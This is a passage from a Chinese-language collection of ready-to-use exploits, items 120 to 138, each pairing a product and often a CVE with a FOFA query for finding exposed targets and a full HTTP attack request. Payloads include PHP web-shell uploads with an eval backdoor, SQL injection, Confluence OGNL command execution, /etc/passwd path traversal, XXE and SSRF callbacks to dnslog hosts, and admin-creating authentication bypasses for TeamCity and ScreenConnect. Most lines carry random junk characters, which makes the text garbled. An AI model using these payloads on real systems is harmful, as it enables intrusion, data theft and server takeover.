X-Forwarded-For: 1.1.1.1: `6 p3 V0 B, u( N; V
X-Originating-Ip: 1.1.1.1/ `: ?+ x. y- L% R4 l
X-Remote-Ip: 1.1.1.1" M; Q4 |+ z! b$ M6 ~# M; R4 w
X-Remote-Addr: 1.1.1.1
f5 P7 D+ W( y, \# tTe: trailers7 O! x2 Q s+ `
Connection: close3 }$ U5 B- u. l: f1 {1 m
) h, u) L: t9 _" u$ Isrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234562 A6 _; w7 a; `1 ^
! O" @$ J: k4 w$ I
# J9 J, E# d) z5 I120. 北京百绰智能S40管理平台导入web.php任意文件上传
' b2 [! Z4 G6 F3 ICVE-2024-1253
! K) Y/ `, J8 R) P8 X% s! V; zFOFA:title="Smart管理平台"( Y% [. r r+ _, k; O3 h: d% d; C& J
POST /useratte/web.php? HTTP/1.1
% `7 k, C# {% r4 f& o+ yHost: ip:port
" o4 p5 B1 x8 T" f" o9 XCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db9 N5 C) X6 |6 x4 X; \$ U
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko$ L: l! N( l" o% a6 g* P" u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) N* e1 B/ O0 y2 s1 e8 NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) P4 R" q0 j" \) F, ~- sAccept-Encoding: gzip, deflate# k3 L' z/ ~* P A- z/ j: d
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328" D/ u0 T. |% t- X, D; {
Content-Length: 597
b% }0 b! Y* lOrigin: https://ip:port0 f6 R5 o% q5 q
Referer: https://ip:port/sysmanage/licence.php
: ~, c8 G" w/ n' H3 X, wUpgrade-Insecure-Requests: 1
. i4 \1 O: r! ~ bSec-Fetch-Dest: document
' B, L6 c0 l ~) ?Sec-Fetch-Mode: navigate
2 C4 Z* `' F% s' Y; }2 k; {Sec-Fetch-Site: same-origin
: }6 D1 l, D) [. {1 y8 hSec-Fetch-User: ?11 T4 \6 T" ?8 D+ R g9 Y3 {+ ~
Te: trailers* U0 G7 D" G# T0 @2 f' ^$ G
Connection: close2 F) Q6 w. T! S! o* ~1 `8 g; c
2 [2 j, v$ ^: ^; ?, Y/ A& f
-----------------------------42328904123665875270630079328
( N4 ?6 y$ s8 U* lContent-Disposition: form-data; name="file_upload"; filename="2.php"2 U4 [1 q' E2 f. ?/ |% N4 I
Content-Type: application/octet-stream
9 H4 A- c: c. T' v$ Q7 j- W' \3 w
<?php phpinfo()?>& b) x; R! d/ |/ M
-----------------------------423289041236658752706300793281 Z. ]+ M3 v, g8 q8 ?
Content-Disposition: form-data; name="id_type"
- e$ j) X- B: P8 x% h3 S" S( S6 y4 s- v( x4 [5 J5 s: ~
1
4 O8 D8 W% L& V$ g7 Y( V-----------------------------423289041236658752706300793282 a- K* X6 p7 x3 ~* Z' o) ~
Content-Disposition: form-data; name="1_ck"
( }! Q( a' w6 G# m; H9 v
5 C. p: ]* ` d, {) d1_radhttp2 Y e' h& D2 ~3 @
-----------------------------42328904123665875270630079328' Z: T/ O) I$ o( y) z
Content-Disposition: form-data; name="mode"* F* W$ `1 |, l: H$ }* D5 w* j8 ^
' \& o9 q! O. F: X2 _/ l3 w0 ?9 N, F; o
import4 x5 b, ?# [- X5 M/ O4 e9 c N5 b
-----------------------------42328904123665875270630079328
, k/ o$ V L, P6 B9 v3 F" x8 w! v" Z) z* d2 E I4 j
3 q0 |9 F$ C8 o文件路径/upload/2.php) z+ s3 c% G7 I, o0 w1 }
& q, ^4 k2 Q7 j- ?9 S
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
& G9 C5 i9 i* G8 K5 lCVE-2024-1918
, W& Q/ N+ m, M2 H0 I( sFOFA:title="Smart管理平台"
$ q. x* |' v0 V3 i! |$ D3 }POST /useratte/userattestation.php HTTP/1.18 |% T' ^0 s& s h6 T
Host: 192.168.40.130:8443
& p* a1 S: y- w" ~& [Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50- \ A" P7 `1 O% U2 U5 }3 ?+ C$ i; T6 c
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko; K$ |' [5 H1 T, @5 g4 V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( ?4 e8 C L/ @. u) j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 R, a5 ^4 j; T) E8 j: o6 C
Accept-Encoding: gzip, deflate
$ t- d& O/ V `" }; Y! T/ }Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
5 T- m E) u3 d4 A5 }Content-Length: 592
" y& w5 b- h% MOrigin: https://192.168.40.130:8443
7 w7 z6 m) p, q( I$ J. x5 WUpgrade-Insecure-Requests: 1
6 T$ l0 K- ^& f" p$ i' ?* _7 wSec-Fetch-Dest: document
5 m/ \- _. O# g, gSec-Fetch-Mode: navigate' N0 N! H- A9 t2 W7 A
Sec-Fetch-Site: same-origin& g0 k! a6 [! Z4 Q2 \
Sec-Fetch-User: ?1
5 d8 Q% P% o+ aTe: trailers0 Z8 ~8 E6 b) d Y
Connection: close I' _5 @' H8 N9 H$ |5 g6 R
) F" i' R. ?3 ^: `
-----------------------------423289041236658752706300793282 {8 W$ R: u" N( a' w3 T% c! h6 Z9 O
Content-Disposition: form-data; name="web_img"; filename="1.php"2 W- }* r4 b- B: G
Content-Type: application/octet-stream! A* M* b: p$ i; `5 ], F+ s5 {
* V7 C; D' v4 k4 W0 h0 H
<?php phpinfo();?>
8 p- S0 Z( d N+ K! w-----------------------------42328904123665875270630079328
! ^* p8 N& R" F. m7 b& NContent-Disposition: form-data; name="id_type"
" n! [$ ]* ^; Q4 F( @, W, B# j2 B6 E/ O' {
1
1 E( w6 z3 {- q) z; t-----------------------------42328904123665875270630079328& k2 N! F' E% Q' q# _2 N; g
Content-Disposition: form-data; name="1_ck" x0 W# p% { Y% e" D! @7 O, c
' n/ c6 {' @4 x" \' q1_radhttp
/ z9 V9 v# A' @# [-----------------------------42328904123665875270630079328
' S, A$ G8 j/ C& e! f' U% F. AContent-Disposition: form-data; name="hidwel"1 |; a, j! J7 T0 J! _
! b& O/ P, ?+ o( K- E+ [7 Oset6 x( N3 @1 j( D- T1 ?4 g& ]7 @/ E
-----------------------------42328904123665875270630079328) y; G0 P" M0 x
8 W# Z" M1 O. n, j4 I4 h. U/ v& [' n1 x' U& Y
boot/web/upload/weblogo/1.php: r- Z3 Y1 E6 L, d
7 F) N2 o9 O6 V" j; |4 N122. 北京百绰智能s200管理平台/importexport.php sql注入
* h* K- B) U- yCVE-2024-27718FOFA:title="Smart管理平台"" x3 F B9 _6 c' P( I/ Q3 {- d- |
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()# Q- q7 q! I9 u
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1' ^9 p: m. ^9 a1 Z
Host: x.x.x.x
5 t& I2 h4 |( }! qCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0; N3 u5 P. m' u2 n' O( Q. X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0# V7 C* H; ?0 J) \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 w9 M& J5 q# i# JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 |7 `1 w2 V* @ Z2 P
Accept-Encoding: gzip, deflate, br
- M" {! J+ K$ m1 ^Upgrade-Insecure-Requests: 1
9 u, E- H! z4 C3 P( H$ i% aSec-Fetch-Dest: document
. A. {# I" Y9 C2 nSec-Fetch-Mode: navigate) f6 c; ]" b. P) Q8 M
Sec-Fetch-Site: none
5 C% e6 }8 I+ c8 R( z/ oSec-Fetch-User: ?1( M6 R8 e6 O. R0 }( e5 x
Te: trailers& r; w% ?$ M6 l ?! u( _" A7 s
Connection: close
* j$ L2 [' j. o! G% R6 Y: F$ t j. e; m) W& r/ U
/ ?+ h% G2 a& z. V2 `" e3 l
123. Atlassian Confluence 模板注入代码执行
4 R7 d, C: x6 r* w& E: D+ A2 HFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
5 w' b/ ?! @5 |POST /template/aui/text-inline.vm HTTP/1.1
4 {* _+ r% m: p; h* BHost: localhost:80902 l, S6 D+ O% o t2 M6 b
Accept-Encoding: gzip, deflate, br' K( c5 Q+ |& G9 m0 L& I1 J
Accept: */*
3 x' T: l' j/ u/ k% O# Q+ E! T1 jAccept-Language: en-US;q=0.9,en;q=0.8
1 T7 Q% ~/ _" D4 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.369 D, F& a% G) Z8 e' _ ^ T
Connection: close2 w7 ]: T( I/ p9 k3 z6 J1 m4 v1 q
Content-Type: application/x-www-form-urlencoded8 S* k2 o) D U/ U6 a" g
0 C) U G' A& Q7 z; ?
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
; Z8 ?$ P* J& w6 l
& K/ H+ |/ Y& D/ V9 l+ ^7 z/ P9 w
7 l0 G9 Z0 S- U0 `) |, D124. 湖南建研工程质量检测系统任意文件上传
( {7 L. t, k5 F9 Z vFOFA:body="/Content/Theme/Standard/webSite/login.css"6 Z9 e$ @+ p! A9 w
POST /Scripts/admintool?type=updatefile HTTP/1.1
0 u& R& R! M9 q5 s/ m2 J, O% \Host: 192.168.40.130:8282
1 h- X8 a4 ?& @3 X8 wUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36* c( C& h' W1 I
Content-Length: 72/ e* ]" S3 ~/ y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
1 j" W) @& S( G. rAccept-Encoding: gzip, deflate, br
; `- P" Q+ n' n; G- AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) X! G' k. K$ C! O6 B$ ]7 QConnection: close
# R, l. v- h' I* ^3 P( D5 hContent-Type: application/x-www-form-urlencoded
) v* ^" X0 C1 F6 q" I2 n4 i, e. n
. ]- ^8 `9 O3 C5 {- O2 ]$ ^) [" lfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
" f D# H+ ~# i$ ?$ O9 w
/ _$ p+ H0 n" [9 h2 P* Q7 W4 K. ^! A2 E' V, b" x4 y/ c
http://192.168.40.130:8282/Scripts/abcgcg.aspx- `4 q" l( X1 e, J; n
# N; x4 c; g8 ?. _; o0 {8 G
125. ConnectWise ScreenConnect身份验证绕过
+ }( d, Y6 Z+ k+ \- m; hCVE-2024-1709' [* m- R6 s: ^/ P, r) U
FOFA:icon_hash="-82958153"
" \' V6 i& E9 a* g: jhttps://github.com/watchtowrlabs ... bypass-add-user-poc3 N* j5 I, K, E; h8 U
# U2 |9 d- `# x
# G& ^ E5 a/ x, p1 t4 S使用方法
' e9 q* k+ y3 Z3 Q$ {python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
/ E8 x7 D5 {7 x+ z D; O% a+ p3 K; U0 x$ r% m( g
9 L y: I- l F0 ?, q创建好用户后直接登录后台,可以执行系统命令。
3 x4 [7 k; H- N/ C
+ Z+ r+ N; A3 h' p+ F6 M126. Aiohttp 路径遍历, M3 X: [2 o4 Q* [+ _
FOFA:title=="ComfyUI"
$ n2 i6 p' z6 _2 ?0 NGET /static/../../../../../etc/passwd HTTP/1.1
6 c6 W6 t8 q) b$ ]$ n/ y, dHost: x.x.x.x
+ s4 w0 B" C5 F* rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36# O8 M/ ~5 g5 y( I5 U d) o
Connection: close5 _# e! @& c6 H) \/ h" Z
Accept: */*
$ E1 C' l( M! C& _! H6 q6 ~* A, c$ B: ^Accept-Language: en8 t1 ?, J* R; \- @8 v: T
Accept-Encoding: gzip# d# r. {* [: o" [9 L k; B! {' }
8 W6 [6 J% u5 D4 U% ^3 `1 e7 q9 G. c6 d) d2 ?9 e8 c6 B
127. 广联达Linkworks DataExchange.ashx XXE
. s3 o5 ~$ p: u: k8 y7 C- V, _FOFA:body="Services/Identification/login.ashx" 6 Z: P& p$ h, G+ O. f
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
2 I9 b: p& J- b, K8 M# f. E# {; ?Host: 192.168.40.130:88889 h+ U* y9 Q `) p8 f. O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
7 N, H q+ v7 G2 W3 G$ }! P7 [Content-Length: 4152 W% `+ N% c! I2 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 u* Z+ F/ F( o' h% ^Accept-Encoding: gzip, deflate
- o8 Q8 A1 w5 ZAccept-Language: zh-CN,zh;q=0.9
$ }' W U( F9 oConnection: close9 |- ^9 _# W9 ~0 n2 y5 p- Z$ w, k
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
* K0 i0 |( I& _- T+ i$ mPurpose: prefetch7 q W; }4 A8 @7 R5 o4 Z
Sec-Purpose: prefetch;prerender$ e* q" E' j/ N4 E8 ]* ^/ d2 v
9 ]5 ]3 o2 q3 F( e; |2 G! u" H8 ?
------WebKitFormBoundaryJGgV5l5ta05yAIe0. k# H) n* T% X
Content-Disposition: form-data;name="SystemName"
& i. \; y7 T& p+ Q! V
- |$ T3 l- D- E* J3 n; [BIM
4 e# x, @% W U* w. I2 O+ n------WebKitFormBoundaryJGgV5l5ta05yAIe0
! i* l7 J/ [/ S2 c: n2 i) gContent-Disposition: form-data;name="Params"
; z7 R: e! _2 P( A( R' R9 Q- QContent-Type: text/plain
3 s5 N' C9 b1 ^5 W# }* H6 Z. H8 V% ~# M0 J
<?xml version="1.0" encoding="UTF-8"?>7 Z) l5 r; y3 h) C
<!DOCTYPE test [& _% w- A, f& B" N
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
/ r ^3 ] T- O2 O" a]4 C9 h1 A% l! q6 E ? w
>
5 |8 _" Y/ c+ ]: C* w! ^: t- A3 [<test>&t;</test>
4 a, V$ j% L1 M; R, {& y------WebKitFormBoundaryJGgV5l5ta05yAIe0--
% o% l) g* P C8 z0 p t" U" n; h$ v
& d* `4 K# V6 d8 j: R
4 |6 i; `# Z' Y: p128. Adobe ColdFusion 反序列化
) W, v0 Z; E! D! x% m1 q0 ]CVE-2023-38203
+ v, x2 T2 @9 W0 j2 `Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)3 R/ q5 h# E+ }* P$ M" D
FOFA:app="Adobe-ColdFusion"
$ a% U# f7 x% y& c) e7 Z) dPAYLOAD5 U2 j) K }4 A' O8 G5 Z$ c0 a
) r5 L- Z0 H3 G5 E. i" [( d129. Adobe ColdFusion 任意文件读取
6 M1 `! k* x) i7 t, mCVE-2024-20767
% c8 `1 s2 Q* u2 x; d8 \ KFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
# g; x5 m! B* l第一步,获取uuid5 ~1 E, N8 d3 P/ e1 \
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1$ Z) t% b) {- m; v6 p9 g7 b
Host: x.x.x.x
; d1 y. |" L2 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
, _* T0 C h j, l5 K# d- GAccept: */*
7 ]4 n, J& c' {( \Accept-Encoding: gzip, deflate
$ i- i. X' T- _* C4 lConnection: close
# n8 w- q: i6 s1 a) b+ ?9 U4 x1 d5 P, O V- d- y( g
' X/ \8 e- ^+ w4 i5 g2 l第二步,读取/etc/passwd文件
* N" L: d3 K$ V r2 j) P$ ]GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
" t' b* V( x+ P$ w: rHost: x.x.x.x
, ~: U& Q7 a/ V1 y% |$ H# }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
# m% N4 A' ~. `$ wAccept: */*1 W9 M: \6 a. f S3 j3 N
Accept-Encoding: gzip, deflate r& b! Y6 J' v& O @! t2 W
Connection: close
7 A. y: n2 O% v3 X5 ?8 `' |uuid: 85f60018-a654-4410-a783-f81cbd5000b9: L1 _+ j# g- z+ G
7 r/ d/ W9 c+ r" I O/ ]
! B! G" K' N' p K7 R6 V& G, A" ^7 H130. Laykefu客服系统任意文件上传
, J1 X( \8 V& M" MFOFA:icon_hash="-334624619"
" z+ Q$ b" f6 f2 _9 G; t- u! U. yPOST /admin/users/upavatar.html HTTP/1.1
9 a% h+ D0 i, P7 l+ {5 }2 Q! gHost: 127.0.0.1
. @1 ^% t2 D& GAccept: application/json, text/javascript, */*; q=0.01
3 i) u2 A$ h+ NX-Requested-With: XMLHttpRequest
! e) Y5 m1 l3 W8 gUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.260 v7 F" T' l& J' D" ? `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR3 p9 b% b& j9 ^* V U' @6 `9 V; W
Accept-Encoding: gzip, deflate3 H: ]$ @" p. b9 B& N3 ?8 t
Accept-Language: zh-CN,zh;q=0.9
0 z- m, d, u5 @! F |& _, s4 uCookie: user_name=1; user_id=3. K+ k2 Z+ d$ E" J* Q' l
Connection: close
" _8 @& \' Q: z6 M9 N' z
, g( h8 J0 f% I8 M) R------WebKitFormBoundary3OCVBiwBVsNuB2kR
g# m; H9 g. E/ {0 i9 ^# OContent-Disposition: form-data; name="file"; filename="1.php"$ ~8 b& T' g ?/ I! |
Content-Type: image/png5 K4 h0 e- t/ S& H, y- F6 x
7 q, O% @3 c$ O0 Y<?php phpinfo();@eval($_POST['sec']);?>
9 `3 Z# T6 t X% a- f0 n& s------WebKitFormBoundary3OCVBiwBVsNuB2kR--) ^8 Z$ b6 p1 l* z9 i$ H7 b
; l2 A! K# t2 M \6 l
$ N$ m( t( k' X$ R+ A# |+ ]131. Mini-Tmall <=20231017 SQL注入
5 _) S; }# U: }( DFOFA:icon_hash="-2087517259"
; G/ a) H& X. i1 {' |3 t* S后台地址:http://localhost:8080/tmall/admin: M" ?* U/ w# T# y) }
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
9 i; x6 v( X& A; M9 e" U. _1 s' {5 `# i- w$ |
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
9 k5 S6 A, F3 b6 g2 gCVE-2024-271983 K. O M3 v" X, u9 b, T' O
FOFA:body="Log in to TeamCity" l% P* d. d% ?
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
' g6 q, P, I& ?6 c$ K1 @Host: 192.168.40.130:8111
! h, _+ d5 L' A: ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) ^7 \9 F( x+ b; ]
Accept: */*: V, Q2 K' H! N! B! Z5 X# z7 }) |
Content-Type: application/json! x: f0 Q- y& A6 t6 P
Accept-Encoding: gzip, deflate4 U0 m8 N1 L% v! c$ @+ f
6 \! [/ I/ X! T: L) e: t
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}# _7 V: N, A8 h; y3 }- A. q. }
( R: k2 h9 \6 p+ N; b! L7 R6 C3 k
3 F |) { |% F2 bCVE-2024-27199
* L+ u% Z5 x7 @7 R3 X7 f/res/../admin/diagnostic.jsp( N+ `& } Y$ k4 U: j; T
/.well-known/acme-challenge/../../admin/diagnostic.jsp1 n% e- l6 T. D4 L& G! G K
/update/../admin/diagnostic.jsp F8 U) Z [' v3 k) |" q
# V8 @' ]7 g B, J+ R* P5 P, f& ]; e: T2 \4 G% a- g2 B6 s! I
CVE-2024-27198-RCE.py
8 ?! y! N# d) b6 L' S7 f
$ \1 y9 T/ J3 z' e p133. H5 云商城 file.php 文件上传& N) Z3 Y) E C5 {4 c, U2 ?( ^. m! h
FOFA:body="/public/qbsp.php"3 n; W% K5 x+ R7 b M2 Z! e
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
I' m- g% v- y9 lHost: your-ip
3 Y/ f6 V5 [) R7 ^8 l) h) ^, i$ |7 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
: L: ~5 t/ x& P" Y* u. tContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
" y/ Y! e/ `" @$ c5 y7 ~# w
. `: h9 o$ B' m6 }% R. L------WebKitFormBoundaryFQqYtrIWb8iBxUCx
0 f& x) `3 \# A9 U* nContent-Disposition: form-data; name="file"; filename="rce.php"# K3 s. {# C+ W7 N( b
Content-Type: application/octet-stream0 Y/ M5 b, I) G* w% h+ J2 a
C0 y) q! W$ \
<?php system("cat /etc/passwd");unlink(__FILE__);?>
) J) F+ b" j' g+ s------WebKitFormBoundaryFQqYtrIWb8iBxUCx--2 Q4 _& D( ~! H( ?! N! H
2 H) h6 U: k$ g* V: C6 e# }; G6 N8 X% F# S, G
% a& S( Q" v. v+ x9 Z
134. 网康NS-ASG应用安全网关index.php sql注入 V# b6 u0 l; _* h
CVE-2024-2330* {3 Z6 c& { g8 V4 B5 n T
Netentsec NS-ASG Application Security Gateway 6.3版本
* Q* q" Y) L2 F& kFOFA:app="网康科技-NS-ASG安全网关"' K+ u0 W! f3 R7 ^8 }: D
POST /protocol/index.php HTTP/1.1# i( z8 O7 @; _& N+ O7 q4 ?
Host: x.x.x.x7 m0 ^( \0 H" U3 u& \' o
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
0 T1 h" e) _3 S+ R* y h6 [5 x" dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0' m3 F: H6 D, [1 |
Accept: */*- {1 S( w2 w6 R: m5 J1 {" I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ H! J/ M' F9 ]6 v a+ Y, `/ @9 M& KAccept-Encoding: gzip, deflate
0 z) O6 m" E$ W, W# F3 RSec-Fetch-Dest: empty- R' M3 `, t: W2 p( ~) Y9 z
Sec-Fetch-Mode: cors( c0 P B+ U+ Z T
Sec-Fetch-Site: same-origin7 |* o! g; a2 E# U# ?
Te: trailers( w+ A# c( ]. j- V$ i; N& t4 s
Connection: close
2 _9 W* F# s* z2 R @9 k2 e( B: eContent-Type: application/x-www-form-urlencoded
9 w6 ~) A3 g0 _Content-Length: 2633 I q% C' y0 d# N( j$ |7 r
@2 H7 }& L& q. ^0 zjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
) p) Q' i( W0 m4 c U J! ~
4 R0 I( b* v7 t* P/ W0 ^! b" H+ W$ p
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入- _: G8 g3 F# u. c3 A C7 G
CVE-2024-2022! W8 w4 z* X7 `5 S: ~
Netentsec NS-ASG Application Security Gateway 6.3版本) U8 w5 P9 R' D E; y' d
FOFA:app="网康科技-NS-ASG安全网关"1 p x8 t0 J4 G) h8 K7 C; ?8 x
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1' R3 F) A) a/ N8 m5 P( g" B
Host: x.x.x.x
+ l# e1 p1 y( `5 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
# ^: Z+ N3 S/ Q" NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! E3 T+ P3 H' S( G) f6 ]5 IAccept-Encoding: gzip, deflate
* ~; {; M5 \2 e) \8 QAccept-Language: zh-CN,zh;q=0.97 {0 g3 \* ]& ~& U+ \
Connection: close( O" J2 y# P, n
& c& n" i, w7 o! Z4 i1 y; M+ L7 a: v; t
136. NextChat cors SSRF
+ l( u( O& V' K# mCVE-2023-49785
7 o* s0 {! u0 p8 w) K/ I. eFOFA:title="NextChat"
/ e z! \; \5 R- i( H& E4 v4 tGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.14 U- z% |( t3 V# {
Host: x.x.x.x:10000
) r1 q5 q0 `/ U1 b8 i9 Z; P% g# ^7 MUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' ~* H$ J/ I0 [. b4 R4 ]! N$ kConnection: close4 Y5 ]. G/ O5 P Q% h
Accept: */*6 d) C3 P) y2 H4 c: `
Accept-Language: en
% f1 \) S, ^/ ~1 `+ e& W( \Accept-Encoding: gzip
* L% e) r+ d) p$ j* d& E; e4 {* v. M2 d* b, _& L
; ~: k6 ]4 Y" i8 E5 M% p137. 福建科立迅通信指挥调度平台down_file.php sql注入$ M7 h2 u! z( t
CVE-2024-2620
3 @/ f# s2 z# `( `FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"9 |% p3 U W( g
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1& t5 T9 p3 k" I9 P( W
Host: x.x.x.x m" T4 ~% v$ T7 v8 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
% B7 ]4 x3 y( j$ C. s9 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 E9 G( ~" H7 M5 l }& y2 s9 b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 x: G) `: }& D4 u$ O0 P
Accept-Encoding: gzip, deflate, br
+ A4 X+ ^1 V& K" D6 BConnection: close" Y* `! i% g+ C/ c: u3 }/ h3 n! j
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj, N$ }/ G! i A2 a
Upgrade-Insecure-Requests: 1, l& P! o, {7 w w" I
) U. S$ j" K5 c9 i5 o V
$ A; U8 @* b3 @, r" A, c# x4 L& F
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
# K2 T. [2 }- {; v3 @CVE-2024-26216 l U J: W+ _8 D
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"9 C# P9 Q9 p2 e# Z$ m( Q
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
# z: n& s# M4 b3 ?1 J7 `2 `Host: x.x.x.x& g. `. n! X1 H j0 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
2 D- u! v% c1 `8 z( h2 {) @* MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 m& S; |7 S- I, H& F' u! I/ H# zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 d, Q$ J) z6 Z5 S: c* f# OAccept-Encoding: gzip, deflate, br
" R9 E; k) |% e5 C' _9 C7 G( V2 |Connection: close
) ^7 o) [+ u& }" E- A* c8 s- aUpgrade-Insecure-Requests: 1
& i& k5 o3 p. J3 m3 G5 c3 q
